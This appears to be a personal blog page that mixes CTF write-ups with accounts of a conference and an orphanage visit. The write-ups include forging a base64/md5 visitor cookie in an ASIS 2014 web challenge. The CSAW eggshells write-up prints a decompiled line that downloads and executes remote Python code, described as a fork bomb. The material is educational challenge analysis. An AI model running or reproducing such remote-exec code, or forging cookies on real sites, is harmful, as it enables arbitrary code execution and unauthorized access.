Tummala Dhanvi's Blog

LOTTERY ASIS-CTF-2014 Web-100 writeup

This question it the basic of the web challenge if we go to the link given above we usually get a message like this when we visit the page for the first time 🙂

As the page says let’s visit the page for the second time 🙂

So here comes the lottery which says that we are 2444th visitor and we need to become the 1234567890th visitor to get the lottery also with the clue saying that don’t hack cookies. We should be always doing the thing that we are not supposed to do so let’s try hacking the cookies. But the first thing we need to do when we see a web question is to view the source page of the given question 🙂 but when you see the source page you will understand that there is no other way to find the visitor number except the cookie 🙂

If you not aware what a cookie is find about it http://en.wikipedia.org/wiki/HTTP_cookie

I have a cool tool which is called as “edit this cookie” to edit the cookies you can get it in the chrome store at https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en

if you look at the cookie named Visitor you will see a value like this which is url encoded

MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA%3D%3D

for more details about it visit this wiki page of the URL encoding http://en.wikipedia.org/wiki/Percent-encoding

If you have doubt why we should use the URL encoding this link will give the answer to you http://stackoverflow.com/questions/4667942/why-should-i-use-urlencode

If you decode it using any tool, I use this online tool http://www.url-encode-decode.com/

The decoded result will be like this

MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA==

which again seems to be like a base64 encoding if you decode it the output looks like this

2456:7cf64379eb6f29a4d25c4b6a2df713e4

2456 seems our number which we visited so if we could change the number to 1234567890 we could win the lottery (get the flag 😀 )
The number after the 2456 is nothing but the md5sum of the number 2456 🙂

1234567890:e807f1fcf82d132f9bb018ca6738a19f

is the one we need to make the value of the cookie to base64

MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg==

and finally we need to encode it with URL encoding which looks like

MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg%3D%3D

so if you submit the cookie and refresh the page you get the flag as

ASIS_9f1af649f25108144fc38a01f8767c0c

Here is the screenshot of the flag 🙂

HOW MUCH EXACTLY? ASIS-2014 Trivia-25 writeup

This is a very easy question as google was enough to get the key 🙂

If you google the description you will get the following link https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt

If you search for (Ctrl+F ————-> find) in the link for how much you will be knowing that all the references are taken from this link http://www.sims.berkelev.edu/research/proiects/how-much-%20info-2003/execsum.htm#summary

Unfortunately this web-page is not available now if you google for it you will get a link in www2 as http://www2.sims.berkeley.edu/research/projects/how-much-info-2003/execsum.htm

If you search for the IM (Instant messaging) you get it’s size is 274 Terabytes

The format of the flag is ASIS_md5(size)[which means that we need to find the md5sum of size and append “ASIS_” to it. Which results in the following flag. we can find the md5sum of any value in the terminal using the following command

echo -n 274 | md5sum

The -n flag is to mention echo no to give the newline, as echo by default gives the newline “n” as the newline at the endof 274 changes the md5 sum so we should not forget it 🙂

ASIS_d947bf06a885db0d477d707121934ff8

But later I found that the size of the instant messaging was directly in the link https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt

I should have searched for instant messaging in the text file directly which I have later learned from other write-up

T_1000 ECTF Recon-120 writeup

This is the toughest recon that I have ever seen (or in other words the worst one :P)

First result that you find when you search for T_1000 is the terminator so I tried all the names related to the movie such as the director, the producer, the actor who acted as the T_1000 but no result 🙁 I have also tried skynet which is considered to make the terminator in the film 😛 my team mate was kidding saying to enter the flag as Rajinikanth 😀

After asking admins about the challenge, I have concluded that T_1000 was not related to movies 🙂

My team mate solved the forensics-500 which relates to the channel #nitk-maliciousbots which contain the bot named T_1000 , so I thought this was end of the recon so I tried to get the flag by asking the bot in private message, but this was only the half of the challenge 🙂

Again from the clue whois T_1000, the output of the whois command in irc is as follows

@31337_h4X0R (cinch@2a01:7e00::f03c:91ff:fe56:df09)

BOT_T_1000 is connected via holmes.freenode.net (London, UK)

Operator in:

#nitk-maliciousbots

so we got a new thing to google for 🙂 ie.. 31337_h4X0R, it seems that 31337_h4X0R has a twitter account here is the account https://twitter.com/31337_h4X0R

This account has very few tweets and it contain this photo

And finally if you grep for the strings in the photo we get the flag as follows

flag{I_am_N0t_Ge0Hot}

Eight Cats Hid The Flag ECTF 2014 Recon 100 writeup

From the question and the clue given we can surely say that the flag is in one of the github of the admin’s.

First I have got the idea of downloading all the files and grep them for the flag (this method did not work because the flag was deleted, so you can’t find the flag in any of the repositories )

I tried manually checking all the commits of the admin’s but I didn’t succeeded bcoz the commit was very old like a month old, I didn’t go that deeper into the commits 🙁

here is link of the commit in which the flag was deleted https://github.com/karthiksenthil/Learn-Git/commit/9cd4ecad6f7c545ef5ac31622d503de811191d7b
flag{0ctocat_c4n_play_h1de_and_s33k}

Meet The Team – Ectf 2014 Recon-80

I have attached the screen-shot of the question 🙂 of Recon-80

The question is very simple but getting the blog of the team becomes hard because ECTF is organised for the first time.

The ECTF organizers doesn’t have a good blog which contains all the write up’s that they have solved, it seems like they have created blog just for the case of the challenge as the blog contains only one post which makes it difficult for the search engines to get the get that link (if any of you googled for the blog and did not get the link don’t blame google as it is doing a great job)

The name of team which is organising the ctf is NIA (no internet access). They have mentioned it in the clue also but you will never get to know that it is the name of the team for more details visit this link http://nia-ctf.github.io/

Bingo you got the blog link in the ctftime.org at this address https://ctftime.org/team/8096 and you get the link as http://nia-ctf.github.io/ so you got the flag, there was some small confusion regarding the format of the flag but the admin would have helped you at that time 🙂

flag:http://nia-ctf.github.io/

Debutsav 2014 – My experience

I was well aware that there will a MiniDebConf conducted in our college through our internal mailing list It was also mentioned that name was changed from MiniDebConf to Debutsav as this conference was not only about Debian but other FOSS projects in general, here is the website http://debutsav.in/, but I got involved in conference when our seniors are looking for volunteers in the last minute and meeting was going on in TBI and I was working on some CTF or something related so I to joined them and I was given the work of accommodation of the delegate along with Surya chechi so no work at that moment but there will be full of work on the starting day of the conference and just before it.

We got very few rooms and rooms were in the 5-th floor without lift you can understand how difficult it might be to the people who attend! I and Joyce made sure that there were mats and pillows there so that the attendees won’t have any problem 🙂

But we had a internal issue in the campus regarding the mess food and the campus need to be closed (I agree that the mess food is not tasty but I have seen the cooking of the mess food it’s very hygienic) so our college is closed and all students were asked to leave the campus immediately! so most of the registrants can’t attend the conference dam!

So on the morning of 17th October morning all I need to do was to show the participants to show the rooms and talked with them very well. One of them was from Amrita Coimbatore and others were here because their professor asked them and some others from Bangalore.

And the conference started with a keynote from Krishnakant Mane https://twitter.com/kkmane he is a awesome guy he inspired a lot from his speech one thing I remember from his speech is

“We need a brain to Code not eyes”

when some one asked about his differently-abled

Also Harish talked on the stage 😀

And the session were started and few of them were about localization by sirish and ScrollBack by Priyanka Nag and by Praveen

Also there was also few sessions taken by our seniors, one of them was about zsh by Athira Lekshmi chechi and she told me that my article https://dhanvi1.wordpress.com/2015/02/14/zsh-the-ultimate-alternative-to-bash/ was very helpful to her 🙂 and I felt very happy 😀 . I couldn’t attend everything as I was showing people who were late to the conference their rooms. I also got cool T-shirt of the event!

There were also some hand’s on workshop in the night about installing Diaspora I didn’t stay much longer as I was feeling tired and headache but the hackthon went well and found later that Akshay got the thing working and got the T-shirt, I should also have tried.

Next also the conference went on but I didn’t attend it and continued with my work (CTF’s) more hand’s on in the night and it ended with Bujiji give the speakers Ammas books and a group photo and I was missing in it as usual!

After the conference ended Bithin etta took back all the mats and returned them, I felt bad as it was my work to do and he did it on his own, I wish he should have called me then I would have done my job for sure! any way thanks etta.

Other blog and Photos :-

http://www.j4v4m4n.in/2014/10/23/debutsav-14-at-amrita-a-rewarding-experience/

https://flossexperiences.wordpress.com/2014/10/28/debutsav-2014-experiences-day-1/#more-2724

http://balasankarc.in/tech/?p=576

http://priyankaivy.blogspot.in/2014/10/debutsav14-at-gods-own-country.html

https://harishnavnit.wordpress.com/2014/10/12/debutsav-14-behind-the-scenes/

https://framasphere.org/posts/94192

https://www.facebook.com/events/1470726469873860/

https://twitter.com/hashtag/debutsav

https://poddery.com/posts/1407655

https://www.facebook.com/allamsetty.anup/posts/782159758515612

CSAW CTF Quals 2014 – eggshells (100) writeup

Here is the link of the zip file and the question http://shell-storm.org/repo/CTF/CSAW-2014/Reverse_Engineering/eggshells-100/

The question is :

I trust people on the internet all the time, do you?

Written by ColdHeat

The question doesn’t give you any kind of hint when you first try to solve it but when you finally see the result it makes some sense to you 🙂

First when you unzip the file you get two directories named as “eggshells-master” and “__MACOSX” here are the screenshots of the directories of the both the folders.

The source code of all other files except the utilys.pyc file which is a python compiled file you can decompile it using this application (https://sourceforge.net/projects/easypythondecompiler/ ) which is based on uncompyle2 (https://github.com/Mysterie/uncompyle2) or what ever which can decompile python 2.7 file 🙂

If you decompile the file here is the code that you get:

[code language=”python”]
exec __import__(‘urllib2’).urlopen(‘http://kchung.co/lol.py’).read()
[/code]

Don’t be in a hurry and just run the code as it is a fork bomb 🙂

here you get the flag : flag{trust_is_risky}

Now you get why the question is like that 🙂

CSAW CTF 2014

I have participated in my first ctf csaw 2014. Even though I could not solve a good amount of questions.

Here is the link of the website https://ctf.isis.poly.edu/. There is a good archive of the problems in the shell-storm website here is the link http://shell-storm.org/repo/CTF/CSAW-2014/.

You can expect me to writing the writeups for the questions specifically reverse engineering

After a long time :)

I am blogging in this domain after a long time, I will now start writing all the writeups in this domain except of the picoctf which is hosted at http://picoctf.wordpress.com/ . I would also like to share my personal views in this domain like the fossmeet which was my first blog 🙂 .

In this period I was getting trained in security (hacking) and also started a new blog especially for the picoctf, you can increase the stats of the blog at http://picoctf.wordpress.com/ .Also I will stop writing silly posts such as the Gmail hack and the browser which can be easily found out by a simple Google search.

That’s enough for the chit-chat let me get into my business (blogging).

Paripilly orphanage Visit – My experience

I came to know about this one as usual in the mailing list and it was being planned by Sreedevi chechi, there was also a reply to email by Sakshi Bansal chechi saying that it was very good experience but I wasn’t much interested because I thought it wasn’t technical and thought I would rather spend my time working in the lab! but I changed my decision when Sreedevi chechi came to our class and asked me if I was coming and asked about other people from the TBI and told me to come saying that it will be good so I changed my decision and thought of attending it!

After having breakfast on the day I was waiting for the bus to arrive along with my friends and all the seniors and they brought football other items to play with the kids. I was with Sairam and Rakesh and make my day worst I did a clean shave and this makes me look a little awkward.The bus came and it looks a good one not like the one we got for FOSSMeet 😛 and we all danced in the bus too!

After we reaching there we had some cultural activities and looks like every one liked it, the warden was very strict but Vipin sir told me that he also likes the kids and enjoys with them 🙂 here are the pics

Every one were talking well with the kids and mingled with them very easily even me! and few of them found me funny bcoz I was looking like a comedian in some tamil movie but they didn’t tease me to much! more pics

You can say how really our seniors enjoyed from this pic 😀

Pics of Vipin sir and Mohanasundaram sir

It was food time by the events ended and here comes the food 🙂 we served them and one thing I found very good about them was that every one waited until last person get food and started every one got food and they started eating food only after doing prayer together, wow what a discipline even we can’t do such thing! More pics

And we also a team group pic 🙂 I know I look a bit different!

And after the food since the day we visited them was also Rakhi (https://en.wikipedia.org/wiki/Raksha_Bandhan) we explained them how to create a simple rakhi using wool and every one were happy

And next we started playing games with them, Girls played few simple games and we played football (yes you heard it right I was playing it for the first time and it did a lot of silly mistakes like touching the ball with hand! same with Sairam also) and high catches with cricket ball. Here are the photos

After the games we had a typical kerala style drums (sorry I don’t know what you guys call them!) and every one danced, I even tried the drums 🙂

And it ended with snacks break and we are done for the day and we ended the day with a Group Photo

And I came to know that we were able to sponsor the kids snacks for the day with the money we put and I felt very happy about it, I wish to do something more to them! Vipin sir also told me that even though they are orphans they are studying well and even learning arts and I envy them as I didn’t really learn anything since my childhood other than my subjects and preparing for IIT! also they need to work hard as they need to manage their work by themselves (they even get up by 4 am daily dam I don’t even get up by 9am) even though Amma is taking good care of them but I found their conditions very bad and can be improved a lot! Also seniors were playing a hand twist game and simply cracked it by doing reverse of it and called my self a RE (Reverse Engineering) expert 😀 even Akshay the hacker couldn’t get it 😛 and I showed how to crack it and told him I used RE 😀

And we all reached the campus by night dropped girls at their hostel and I was kidding with Sakshi that she didn’t tie me rakhi! and she told me that she knows what’s going on in the class and she need not worry! dam! evey one thinks I am in a relationship 🙁

Any way the day went very well and thanks once again to Sreedevi chechi for organizing this and I heard every one felt the same from the emails in the mailing list 🙂 well that’s for sure! and I felt I made a right choice in visiting the orphanage (I learned a lot from them)

Update: I used this visit as a contributorship project report can be found here https://drive.google.com/folderview?id=0BxDZABox5hT2fi0tQUtHeV9qWWlhaEtncENjaHFwWHZvVWx0NTJvb210NURnWDZqTkJqVms&usp=sharing#grid